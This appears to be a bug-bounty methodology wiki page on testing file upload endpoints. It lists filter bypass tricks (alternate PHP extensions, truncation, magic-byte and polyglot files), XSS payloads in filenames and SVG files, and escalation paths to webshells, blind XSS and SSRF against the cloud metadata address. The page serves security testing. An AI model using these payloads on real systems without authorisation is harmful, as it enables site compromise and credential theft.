zseano:file_uploads
Table of Contents
File Upload Testing
File uploads are often filtered on extension, content-type, magic bytes, or image dimensions. Test each layer separately.
Extension Tricks
shell.php/.jpg # server may strip after slash shell.html%0d%0a.jpg # newline truncation .txt, .svg, .xml # often forgotten in filters shell.php5, shell.phtml # alternate PHP extensions
Content-Type Manipulation
- Filename
.jpgbut Content-Typetext/html - No filename or no extension – check what the server defaults to
- Keep image magic bytes (
\xff\xd8\xff) at start but append PHP/HTML after - Polyglot files – simultaneously valid image and valid HTML/PHP
XSS in Filenames
58832_300x300.jpg<svg onload=confirm()> "><img src=x onerror=alert(1)>.jpg
What to Check
- Where are uploaded files stored? Same domain? CDN? Check CSP header
- What validation is in place? Extension, content-type, magic bytes, image dimensions
- Is there a virus scanner? Can you bypass it with a polyglot?
- Is the upload endpoint authenticated? Try uploading unauthenticated
SVG XSS
SVG files are XML and support JavaScript event handlers:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"> <rect width="100" height="100"/> </svg>
Escalation
- SVG upload on same domain = XSS
- Unrestricted file type = webshell if server executes
- XSS in filename reflected in admin upload logs = blind XSS
- SSRF via SVG:
<svg><image href=“http://169.254.169.254/”/>
See Also
zseano/file_uploads.txt · Last modified: by drew